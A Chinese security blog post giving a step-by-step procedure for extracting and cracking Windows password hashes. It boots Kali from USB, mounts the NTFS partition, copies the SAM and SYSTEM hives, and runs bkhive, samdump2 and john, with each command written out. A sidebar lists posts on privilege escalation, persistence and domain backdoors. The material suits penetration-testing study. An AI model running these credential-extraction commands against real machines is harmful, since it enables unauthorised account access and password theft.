j4s0nh4ck
- 浏览: 288011 次
-
文章分类
- 全部博客 (276)
- burp+hydra暴力破解 (1)
- kali linux工具集 (6)
- kali (59)
- linux (54)
- password (14)
- web (63)
- 渗透测试 (50)
- windows (40)
- metasploit (9)
- 信息收集 (32)
- burp suit (4)
- 安全审计 (9)
- https://github.com/secretsquirrel/the-backdoor-factory (0)
- nmap (4)
- arachni (2)
- 工具 (5)
- sql (3)
- 网络 (2)
- 后渗透测试 (10)
- 内网 (5)
- 无线 (2)
- C (3)
- bios (1)
- RoR (12)
- mongodb (1)
- linxu (1)
- gdb (1)
- linux,虚拟化 (1)
- python (4)
最新评论
由于Windows的SAM密码保护机制,SAM文件在Windows启动后就被保护,所以不能开机后破解。
查看磁盘分区。在我电脑测试时为一个/dev/sda5,文件格式为HPFS/NTFS/exFAT
找到存放SAM和SYSTEM文件的文件夹
来查看系统boot key,此时工作目录下多出一个bootkey的文件
使用samdump2命令dump出hash值
来破解密码
引用
1. 使用usb启动kali
引用
2. fdisk -l
查看磁盘分区。在我电脑测试时为一个/dev/sda5,文件格式为HPFS/NTFS/exFAT
引用
3. mount -t ntfs /dev/sda5 /mnt
引用
4. cd /mnt
引用
5. find . -name "*SAM*"
找到存放SAM和SYSTEM文件的文件夹
引用
6. 将SAM和SYSTEM拷贝到工作目录下
引用
7. bkhive SYSTEM bootkey
来查看系统boot key,此时工作目录下多出一个bootkey的文件
引用
8. samdump2 SAM bootkey > hash.txt
使用samdump2命令dump出hash值
引用
9. john ./hash.txt --show --format=nt
来破解密码
分享到:
发表评论
-
[图] windows 10
2015-08-18 20:37 312网上下载的图片,忘了来源 -
windows提权集合
2015-06-30 00:23 591https://blog.netspi.com/5-ways- ... -
[转]Access to every PC and become local Admin
2015-06-29 21:50 530原文地址:http://www.gosecure.it/blo ... -
[转]Top Five Ways SpiderLabs Got Domain Admin on Your Internal Network
2015-06-29 21:46 1633原文地址:https://www.trustwave.com/ ... -
[转]如何获得window管理员权限
2015-06-29 21:21 474引用A tutorial on how to get into ... -
Window提权基本步骤
2015-06-03 22:00 778原文地址: http://www.fuzzysecurity. ... -
[转]malware persistence
2015-05-06 23:46 411原文地址:http://jumpespjump.blogspo ... -
[转]backdoor a windows domain
2015-05-06 22:56 498原文地址:http://jumpespjump.blogspo ... -
[译]解密MSSQL密码
2015-03-26 00:43 2876原文地址: https://blog.ne ... -
[转]badsamba
2015-03-20 00:55 324原文地址:http://blog.gdssecurity.co ... -
window增加硬盘性能方法
2015-02-05 01:03 355参考地址:http://way2h.blogspot.com/ ... -
[译]Skeleton Key Malware & Mimikatz
2015-01-28 20:29 804原文地址: http://adsecurity.org/?p= ... -
绕过PowerShell执行策略的15种方法
2015-01-28 02:27 964https://blog.netspi.com/15-ways ... -
[翻译]oledump: Extracting Embedded EXE From DOC
2015-01-04 22:40 943原文地址:http://blog.didierstevens. ... -
[工具]volatility----Windows内存取证
2015-01-04 22:01 1544下载地址:https://github.com/volatil ... -
[译]Windows提权:ahcache.sys/NtApphelpCacheControl
2015-01-03 21:12 1029原文地址:https://code.google.com/p/ ... -
[译]使用Volatility从memory dump获得密码
2014-12-30 12:27 3807原文地址:https://cyberarms.wordpres ... -
vmss2core将VMware镜像转换成memory dump
2014-12-26 23:59 0参考:http://kb.vmware.com/selfser ... -
Windows工具集
2014-12-25 00:54 537参考:https://community.rapid7.com ... -
Kerberos攻击
2014-12-18 01:39 622参考: 1. http://securityweekly.co ...
相关推荐
采用开源的RTMPDUMP开发的一个发布端实例,RTMPDUMP本身有下载实例,这个是发布端的。需要的朋友可以参考一下
标题 "dump1090-win.1.10.3010.14_dump1090win_dump1090_eastixg_" 指的是一个针对Windows平台的dump1090软件的特定版本。这个软件主要用于接收和处理航空雷达数据,特别是与RTL-SDR(低成本软件定义无线电)设备...
pg_dump: pg_dump -a -t tbl_test "host=127.0.0.1 hostaddr=127.0.0.1 port=5432 user=postgres password=123456 dbname=postgres" > /userdir/tbl_data a 参数是表示只导出数据,其他的额外信息不需要,该参数也...
虽然Windows不是iOS开发的首选平台,但有些开发者可能因为工作需求或个人偏好选择使用Windows,此时`class-dump-z` 的Windows版本就显得尤为珍贵。 在使用`class-dump-z` 时,我们需要确保遵循所有相关的法律和道德...
在Windows操作系统上,生成Coredump文件对于调试和分析C++程序崩溃原因至关重要。Coredump文件包含了程序崩溃时内存中的关键信息,如进程的内存映射、全局变量、堆栈信息等,使得开发者能够定位到问题的具体位置,...
本文将详细探讨如何在Windows程序崩溃后通过代码生成完整的dump文件,以及如何控制生成文件的数量。 首先,我们需要了解dump文件的基本概念。Dump文件是系统在程序崩溃时保存的内存快照,包含了进程内存中的各种...
在Windows环境下,对Android系统的内存dump文件进行解析是一项重要的任务,尤其对于系统开发者和故障排查人员来说。"windows下ramdump-parse解析tools.zip"提供的工具集可以帮助我们有效地完成这一工作。这个压缩包...
### Windows设置Full Dump及键盘触发蓝屏详解 #### 一、引言 在日常使用Windows操作系统的过程中,我们可能会遇到各种各样的系统问题,这些问题有时难以复现,导致问题定位困难。为了更好地诊断这类问题,我们可以...
在Windows操作系统中,当应用程序发生异常崩溃时,为了找出导致崩溃的原因,我们通常会借助于dump文件进行调试。Dump文件是系统在程序崩溃时记录的内存快照,它包含了程序运行时的关键信息,如进程内存、线程状态、...
执行改注册表后,程序崩溃后会自动生成dump
Windows 应用程序崩溃时的内存转储及dump文件的分析 在 Windows 系统中,当应用程序崩溃时,系统会自动将内存转储到 dump 文件中,以便开发人员可以通过 dump 文件来定位问题。为了实现这个功能,我们需要在 ...
"Windows系统下的Qt处理崩溃异常的Dump库,生成Dump文件" 这个标题涉及到的是在Windows操作系统中使用Qt框架进行程序开发时,如何处理程序崩溃异常并生成内存转储(Dump)文件的技术。Dump文件是程序运行时内存状态...
"Windows下用于生成Dump文件的工具"就是为了解决这一问题而存在的。该工具名为Procdump,由Sysinternals开发,它是一个命令行实用程序,专门设计用来捕获进程的内存转储(Dump文件)。Dump文件包含了进程在特定时间...
从当前linux用户dump登录密码的工具
在Windows操作系统中,手工抓取WebSphere Application Server (WAS) 的dump文件是解决系统异常、性能问题或诊断故障的重要步骤。以下是一个详尽的指南,涵盖了如何在Windows环境下进行这个过程。 首先,理解什么是...
MP4文件查看工具,如`mp4dump`,是针对MP4这种常见视频格式的分析和解析工具。MP4(MPEG-4 Part 14)是一种数字多媒体容器格式,广泛用于存储音频、视频和字幕数据。它基于ISO基础媒体文件格式,并且兼容Apple的...
在Windows平台上,C++开发过程中,遇到程序崩溃或内存错误时,通过生成dump文件是一种非常有效的调试手段。Dump文件包含了程序崩溃时刻的内存状态、线程信息、堆栈跟踪等关键数据,能帮助开发者准确地定位问题所在。...
这个工具可以在微软的官方网站上找到,属于Windows Debugging Tools的一部分。 2. **打开Dump文件**:启动WinDbg后,点击"File"菜单,然后选择"Open Crash Dump",浏览并选择需要转换的Dump文件。 3. **分析Dump...
DumpTool主要用来在用户机器上对目标进程生成dump文件,定位“卡死”、Crash等问题。 (1)MiniDump: 表示生成一个包含必要信息的dump文件,文件大小约200-500k,具体Flag =MiniDumpNormal|...
windows_crash_dump_analysis.ppt